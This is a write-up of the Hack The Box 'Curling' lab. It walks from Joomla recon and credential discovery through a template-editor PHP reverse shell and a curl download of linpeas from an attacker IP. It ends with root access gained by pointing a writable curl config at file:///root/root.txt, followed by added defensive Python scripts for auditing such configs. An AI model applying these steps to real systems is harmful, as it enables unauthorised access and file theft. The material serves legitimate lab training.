HTB Curling: Joomla RCE to Curl Config File Abuse
Begin by binding the machine IP to a custom hostname.

Conduct a port scan:
sudo nmap -sV -sC curling.htb

Let's check Joomla:

There was nothing valuable on this page. I also ran a port scan with the --script=vuln NSE scripts:
sudo nmap -sV --script=vuln --max-rate=10000 curling.htb
It reveals some potentially interesting directories and the Joomla version number, which is 3.8.8.

I iterated through multiple fuzzing attempts, yet no juicy information was available except the administrator endpoint. Here are the tools and commands I ran so far:
gobuster dir -u http://curling.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-files.txt
gobuster dir -u http://curling.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-files.txt
gobuster dir -u http://curling.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-files.txt
gobuster dir -u http://curling.htb -w /usr/share/wordlists/dirb/big.txt
gobuster dir -u http://curling.htb -w /usr/share/wordlists/dirb/common.txt
gobuster dir -u http://curling.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Furthermore, I also applied the -r parameter to fuzz deeper. After a couple of minutes of source code analysis I decided to search for patterns like a password hint. I still did not find anything, but after analyzing patiently I noticed that the last line mentions secret.txt as a hint.

Q3VybGluZzIwMTgh: the txt file contains something that looks like a password. I then pushed this through CyberChef ->

This looks like a password: Curling2018!, but what about the username?
One of the posts mentions the curling and 2018 strings, and then I saw floris at the end of the thread message.

I tried Floris:Curling2018! and logged in as superadmin, according to the right side of the site.

Since I was able to sign in directly here, what about using the admin login page?
It works!

Initially, it is appropriate to use the GitHub exploit simply because it is the more accessible and direct solution. Plus, it requires an authenticated user, which we now have, so let's move on with it.

Running it directly was not possible. Therefore, the most useful approach is to create a virtual environment via python -m venv venv and then install the requirements line by line:
pip install requests
pip install lxml
pip install log_colors
Now usage is easy; just follow the guideline:

The script gets stuck, so I manually reached the endpoint where the shell payload is executed:
/administrator/index.php?option=com_templates&view=template&id=503&file=L2pzc3RyaW5ncy5waHA=

The generic PentestMonkey shell works because the application runs on PHP on the backend side, but this time I'll use the reverse shell generator's payload.
Start the listener ->
penelope -p 1234
I used Ivan Šincek's payload:
Save and execute the PHP script through the template preview option, which runs the script server-side.

You must get the floris account to obtain the user flag. I discovered a file called password_backup containing weird-looking content.

I searched for BZh91AY and recognised the same pattern from an OverTheWire challenge.
Let's use ->
xxd -r data > binary
ls binary data
The target machine has the /usr/bin/xxd binary.
I got a permission error while working as the floris user, so I moved to the tmp directory.

The challenge suggested identifying the file type ->

bunzip2 binary or bzip2 -d binary
We have to go further ->

Now I was dealing with the gzip format.

mv binary.out binary.gz
gunzip binary.gz

mv binary binary2.bz2
bunzip2 binary2.bz2 or bzip2 -d binary2.bz2

tar -xf binary2
cat password.txt
5d<wdCbdZu)|hChXll
This is most probably the SSH password for floris.
Gotcha!!!
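The unpacking steps above (xxd -r, then bunzip2, gunzip, bunzip2 and tar in turn) are a manual version of a general procedure: identify each layer by its magic bytes and peel it. The following Python script is an added example, not part of this writeup; it builds a constructed dump in the same shape as password_backup (tar -> bzip2 -> gzip -> bzip2 -> xxd) with a made-up secret, then reverses the dump and unwraps the layers automatically, stopping on anything it does not recognise. The function names and the sample content are my own.

```python
import binascii
import bz2
import gzip
import io
import tarfile


def xxd_dump(data: bytes, width: int = 16) -> str:
    """Render bytes in the default `xxd` layout: offset, hex pairs, ASCII column."""
    hex_width = width * 2 + width // 2 - 1   # 16 bytes -> 8 groups of 4 hex chars + 7 spaces
    lines = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        hexpart = " ".join(chunk[i:i + 2].hex() for i in range(0, len(chunk), 2))
        text = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:08x}: {hexpart:<{hex_width}}  {text}")
    return "\n".join(lines) + "\n"


def xxd_reverse(dump: str) -> bytes:
    """What `xxd -r` does: drop the offset and ASCII columns, un-hex the middle."""
    out = bytearray()
    for line in dump.splitlines():
        if ":" not in line:
            continue
        body = line.split(":", 1)[1]
        hex_field = body.split("  ", 1)[0]      # two spaces separate hex from ASCII
        out += binascii.unhexlify(hex_field.replace(" ", ""))
    return bytes(out)


def identify(data: bytes) -> str:
    """Classify a blob by its magic bytes, the same check `file` would make."""
    if data.startswith(b"BZh"):          # bzip2: "BZh" followed by the block-size digit
        return "bzip2"
    if data.startswith(b"\x1f\x8b"):     # gzip
        return "gzip"
    if len(data) > 262 and data[257:262] == b"ustar":   # POSIX/GNU tar header magic
        return "tar"
    return "unknown"


def unwrap(data: bytes, max_layers: int = 10):
    """Peel compression layers until a tar archive appears, then return
    (list of layer kinds seen, {member name: member bytes})."""
    layers = []
    for _ in range(max_layers):
        kind = identify(data)
        layers.append(kind)
        if kind == "bzip2":
            data = bz2.decompress(data)
        elif kind == "gzip":
            data = gzip.decompress(data)
        elif kind == "tar":
            with tarfile.open(fileobj=io.BytesIO(data)) as tf:
                members = {m.name: tf.extractfile(m).read()
                           for m in tf.getmembers() if m.isfile()}
            return layers, members
        else:
            raise ValueError(f"unrecognised layer after {layers[:-1]}")
    raise ValueError("too many layers")


def build_sample(secret: bytes = b"constructed-sample-secret\n") -> str:
    """Construct a dump shaped like password_backup (tar -> bzip2 -> gzip -> bzip2 -> xxd).
    The secret is a made-up value for the demo, not the box's real password."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        info = tarfile.TarInfo("password.txt")
        info.size = len(secret)
        tf.addfile(info, io.BytesIO(secret))
    blob = bz2.compress(gzip.compress(bz2.compress(buf.getvalue())))
    return xxd_dump(blob)


if __name__ == "__main__":
    dump = build_sample()
    print(dump.splitlines()[0])            # ASCII column of the first line shows the BZh9 magic
    layers, members = unwrap(xxd_reverse(dump))
    print("layers:", " -> ".join(layers))
    print(members["password.txt"].decode())
```

Checking magic bytes at each step, rather than guessing from file names, is what makes the loop safe to run on an unknown blob: an unexpected layer stops the process instead of feeding garbage into the next decompressor.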

I checked for a local privilege escalation vector via sudo -l.

It did not work.
I did not find anything valuable in the admin-area directory at first, so let's start linpeas:
curl http://10.10.15.57:1212/linpeas.sh -o linpeas.sh
It was not useful.
Still, the admin-area directory contains files of interesting formats that turned out to matter for the path to root.

The input file points at localhost, and the report file contains the fetched page.

Let's check by fetching the page via curl ourselves:

Observe that the fetched result matches the page in the report.
I began looking for a way to point this at the target machine's own files in order to read the root flag.
I found a bug bounty report covering the use of curl config files for exactly this kind of purpose:
Try them ->

Alter the content of the input file as below:
url = "file:///root/root.txt"
then read the root flag with cat report.
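The root step works because the input file is consumed as a curl config (curl -K syntax) by a job running with more privilege than the user who can edit it, so a single changed url line turns a web fetch into a privileged file read. The following Python script is an added example, not from this writeup or from the curl project: it parses the curl config format, flags url schemes other than http/https and output paths that escape the working directory, and checks whether the file's ownership and mode let someone other than the consuming user edit it. The sample configs are constructed; the function names are my own.

```python
import os
import re
import stat
import tempfile
from urllib.parse import urlparse

# curl -K accepts "key = value", "key: value" and "key value", with optional
# leading dashes on the key and optional double quotes around the value.
_LINE = re.compile(r'^-{0,2}([A-Za-z][\w.-]*)(?:\s*[=:]\s*|\s+)?(.*?)\s*$')


def parse_curl_config(text: str):
    """Return the (option, value) pairs of a curl config file; bare flags get ''."""
    opts = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = _LINE.match(line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2)
        if len(value) >= 2 and value[0] == value[-1] == '"':
            value = value[1:-1]
        opts.append((key, value))
    return opts


def audit_curl_config(text: str, allowed_schemes=("http", "https")):
    """Flag settings that let whoever edits the file turn a scheduled curl run
    into a local file read or a write outside the working directory."""
    findings = []
    for key, value in parse_curl_config(text):
        if key == "url":
            scheme = urlparse(value).scheme.lower()
            if scheme not in allowed_schemes:
                findings.append(f"url uses disallowed scheme '{scheme}': {value}")
        elif key in ("o", "output"):
            if os.path.isabs(value) or ".." in value.split("/"):
                findings.append(f"output path escapes the working directory: {value}")
    return findings


def loose_permissions(path: str, consumer_uid: int = 0):
    """Issues with a config file that a privileged job (uid consumer_uid) reads:
    someone else owns it, or group/others can write to it."""
    st = os.stat(path)
    issues = []
    if st.st_uid != consumer_uid:
        issues.append(f"owned by uid {st.st_uid}, not by the consuming uid {consumer_uid}")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        issues.append("group- or world-writable")
    return issues


def demo_permissions(mode: int):
    """Write a throwaway config with the given mode and audit it as the current user."""
    with tempfile.NamedTemporaryFile("w", delete=False) as fh:
        fh.write(BENIGN)
    try:
        os.chmod(fh.name, mode)
        return loose_permissions(fh.name, consumer_uid=os.getuid())
    finally:
        os.unlink(fh.name)


# Constructed samples: the benign shape described above (a localhost fetch
# written to a report file) and the altered url line from this writeup.
BENIGN = 'url = "http://127.0.0.1"\noutput = report\n'
ALTERED = 'url = "file:///root/root.txt"\noutput = report\n'

if __name__ == "__main__":
    print("benign :", audit_curl_config(BENIGN))
    print("altered:", audit_curl_config(ALTERED))
    print("0600   :", demo_permissions(0o600))   # the corrected setting
    print("0666   :", demo_permissions(0o666))   # the weak setting: anyone can edit the config
```

The two checks cover both halves of the problem: the content audit catches a config that has already been altered, and the permission check catches the root cause, a config file that a privileged job trusts but an unprivileged user can write.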

